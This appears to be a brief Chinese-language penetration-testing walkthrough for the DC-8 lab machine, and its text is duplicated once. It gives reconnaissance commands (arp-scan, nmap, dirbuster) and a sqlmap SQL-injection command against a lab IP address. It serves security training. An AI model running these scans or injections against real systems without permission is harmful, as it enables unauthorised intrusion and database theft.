需要准备靶机DC-8和kali系统,桥接模式:NAT
1使用sudo arp-scan -l扫描靶场地址
2利用nmap扫描目标系统及端口信息 nmap -A -Pn 192.168.116.153
3利用dirbuster工具进行目录扫描
4打开浏览器登录靶场
5尝试用sqlmap注入sqlmap -u "http://192.168.116.153/?nid=1" -current-db --batch 查看当前数据库
需要准备靶机DC-8和kali系统,桥接模式:NAT
1使用sudo arp-scan -l扫描靶场地址
2利用nmap扫描目标系统及端口信息 nmap -A -Pn 192.168.116.153
3利用dirbuster工具进行目录扫描
4打开浏览器登录靶场
5尝试用sqlmap注入sqlmap -u "http://192.168.116.153/?nid=1" -current-db --batch 查看当前数据库